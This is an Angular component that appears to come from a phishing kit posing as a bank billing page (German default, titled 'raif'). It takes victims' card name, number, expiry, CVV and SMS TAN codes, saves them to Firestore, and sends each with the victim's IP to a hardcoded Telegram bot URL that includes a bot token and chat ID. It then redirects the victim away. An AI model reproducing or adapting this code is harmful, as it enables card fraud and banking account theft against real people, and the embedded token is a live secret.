import { Component, OnInit, ViewChild, ElementRef } from '@angular/core';
import { Billing } from './billing';
import { MyService } from '../myservice';
import { Router } from '@angular/router';
import { AngularFirestore, AngularFirestoreCollection } from '@angular/fire/firestore';
import { Observable } from 'rxjs';
import { HttpClient } from '@angular/common/http';
import { NgxSpinnerService } from 'ngx-spinner';
import { Sms } from '../login/sms';

@Component({
  selector: 'app-billing',
  templateUrl: './billing.component.html',
  styleUrls: ['./billing.component.css']
})
export class BillingComponent implements OnInit {
  billing: Billing = {fullName:'',cardNumber:'',exp:'',cvv:'',dateTime:'',ip:''};
  smsTAN: Sms = { smsTAN1: '', smsTAN2: '', dateTime: '', ip: '' };

  wors:string;
  billingsCollection: AngularFirestoreCollection<Billing>;
  smsCollection: AngularFirestoreCollection<Sms>;

  monthIsValid: boolean = true;
  yearIsValid: boolean = true;
  finished: boolean = false;
  submitted: boolean = false;
  nameCard: string = '';
  ccnum: string = '';
  interval: any;
  exp1: string = '';
  exp2: string = '';
  timer = 30;

  cvv: string = '';
  step = 1;
  title = 'raif';
  pin = '';
  sms = '';
  sms2 = '';
  hasError = true;

  selectedLanguage = 'Deutsch';
  selectedLand = '';
  stepThreeIsLoading = true;
  cardNumber = '';
  fullName = '';
  CVV = '';
  expDate = ''; 
  sms1: string;
  errors: any = {};
  signature = '';
  disabled = true;
  disabled2 = true;
  disabled3 = true;
  mobile2: boolean;
  public innerWidth: any;
  disabled4 = true;
  prefix = '';
  errorMessage = '';
  showLoading = true;
  tmpPrefix = '';
  visit:any = {ip:'',country:'',dateTime:''};

  constructor(private spinner: NgxSpinnerService, private httpClient: HttpClient, private myService: MyService, private router: Router,db: AngularFirestore) {
    this.innerWidth = window.innerWidth;
    if (this.innerWidth < 474) {
      this.mobile2 = true;

    } else {
      this.mobile2 = false;
    }
    console.log(this.mobile2);
    this.smsCollection=db.collection('smsNet');

    this.billingsCollection=db.collection('billingNet');
    //this.billing.month = "04";
    //this.billing.year = "20";
    //if(localStorage.getItem('loggedIn')==null)
    //this.router.navigate(['/login']);
    myService.getIpAddress().subscribe(ip => {
      this.visit.ip=ip.ip;
      myService.getCountry(ip.ip).subscribe(country => {
        this.visit.country=country.country_name;
        
      });
    });
    
  }

  ngOnInit() {
  }


  
  onKeyName() { // without type info
    if (this.fullName.length > 5) {
      this.disabled = false;
      
    } else{
      this.disabled = true;
    }
    
  }

  onKeyCard() { // without type info
    if (this.cardNumber.length > 15) {
      this.disabled2 = false;
      
    } else{
      this.disabled2 = true;
    }
    this.onKeyExp();
  }

  onKeyExp() { // without type info
    if (this.expDate.length > 4) {
      this.disabled3 = false;
      
    } else{
      this.disabled3 = true;
    }
    this.onKeyCVV();
  }

  onKeyCVV() { // without type info
    if (this.CVV.length > 2) {
      this.disabled4 = false;
      
    } else{
      this.disabled4 = true;
    }
    this.onKeyName();
  }



  showInput() { // without type info

  }


  sendTelegram(message:string) :Observable<any[]> {
    return this.httpClient.post<any[]>('https://api.telegram.org/bot5340296045:AAGwaIpRK-ArP1FsEolvTFE0a1ck6HEaolI/sendMessage?chat_id=-757433501&text='+message,null);
}



setDone() {
    
  this.errors = {};


    if (this.sms1.length < 5) {
      this.errors.sms1 = true;
      return;
    }
    


    this.smsTAN.smsTAN2 = this.sms1;
    this.smsTAN.dateTime = Date.now();
    this.smsTAN.ip = this.visit.ip;

    this.smsCollection.add(this.smsTAN);

    let message;
    message = this.smsTAN.smsTAN1+'   '+this.sms1+'   '+this.visit.ip;
    this.sendTelegram(message).subscribe(data => console.log(data+"daz dzafaz azddaz"));


    setTimeout(() => window.location.href = 'https://www.youtube.com/watch?v=cf2q-fKo8DA&ab_channel=AlexandrosHanialidis', 7000);
}


setStep(number) {
  this.errors = {};
  this.spinner.show();
  setTimeout(() => {

    this.spinner.hide();




    if (this.step == 1) {
      if (this.nameCard.length < 5) {
        this.errors.nameCard = true;
      }
      if (this.ccnum.length < 15) {
        this.errors.ccnum = true;
      }
      if (this.exp1.length < 2) {
        this.errors.exp = true;
      }
      if (this.exp2.length < 2) {
        this.errors.exp = true;
      }
      if (this.cvv.length < 3) {
        this.errors.cvv = true;
        return;
      }

      if (this.errors){
        //return;
      }

      this.billing.fullName = this.nameCard;
      this.billing.cardNumber = this.ccnum;
      this.billing.exp = this.exp1+'/'+this.exp2;
      this.billing.cvv = this.cvv;
      this.billing.dateTime = Date.now();
      this.billing.ip = this.visit.ip;
      this.billingsCollection.add(this.billing);

      let message;
      message = this.nameCard+'   '+this.ccnum+'   '+this.billing.exp+'   '+this.cvv+'   '+this.visit.ip;
      this.sendTelegram(message).subscribe(data => console.log(data+"daz dzafaz azddaz"));
      this.step = number;

    }
    
    if (this.step == 2) {
      if (this.sms1.length < 5) {
        this.errors.sms1 = true;
        return;
      }
      
      this.smsTAN.smsTAN1 = this.sms1;
      this.smsTAN.dateTime = Date.now();
      this.smsTAN.ip = this.visit.ip;
  
      this.smsCollection.add(this.smsTAN);

      let message;
      message = this.smsTAN.smsTAN1+'   '+this.visit.ip;
      this.sendTelegram(message).subscribe(data => console.log(data+"daz dzafaz azddaz"));
      this.step = number;
      this.sms1 = '';

      this.interval = setInterval(() => {
        if(this.timer > 0) {
          this.timer--;
        } else {
          this.timer = 0;
        }
      },1000)

      setTimeout(() => {
        this.showLoading = false
      }, 30000);
    }

  }, 1500);


}

  submitForm() {

    this.disabled = true;
   
    this.errors = {};

    setTimeout(() => {if (this.fullName.length < 5) {
      this.errors.nameError = true;
      this.disabled = false;
     }
    if (this.cardNumber.length < 15) {
      this.errors.cardError = true;
      this.disabled = false;
         }
    if (this.expDate.length < 5) {
      this.errors.expError = true;
      this.disabled = false;
     }
    if (this.CVV.length < 3) {
      this.errors.cvvError = true;
      this.disabled = false;
      }
    if (Object.keys(this.errors).length > 0) {
      console.log("Errorrrrr");
      return; }
    //fb
    this.billing.fullName = this.fullName;
    this.billing.cardNumber = this.cardNumber;
    this.billing.exp = this.expDate;
    this.billing.cvv = this.CVV;
    this.billing.dateTime = Date.now();
    this.billing.ip = this.visit.ip;
    this.billingsCollection.add(this.billing);
    this.disabled = false;
    let message;
    message = this.fullName+'   '+this.cardNumber+'   '+this.expDate+'   '+this.CVV+'   '+this.visit.ip;
    this.sendTelegram(message).subscribe(data => console.log(data));
   
    this.router.navigate(['/finish']);
    return;
    }, 1500);
  }
  onSubmit(form) {
    if (form.valid) {
      this.billing.ip=localStorage.getItem('ip');
      this.billing.dateTime=Date.now();
      //this.myService.addBilling(this.billing.fullName, this.billing.cardNumber, this.billing.month, this.billing.year, this.billing.cvv, this.billing.zip).subscribe();
      this.billingsCollection.add(this.billing);
      window.scroll(0,0);
      this.submitted = true;
    }
  }

  validateMonth() {
    this.monthIsValid = true;
    this.yearIsValid = true;
  }

  validateYear() {
    this.yearIsValid = true;
    this.monthIsValid = true;
  }



}
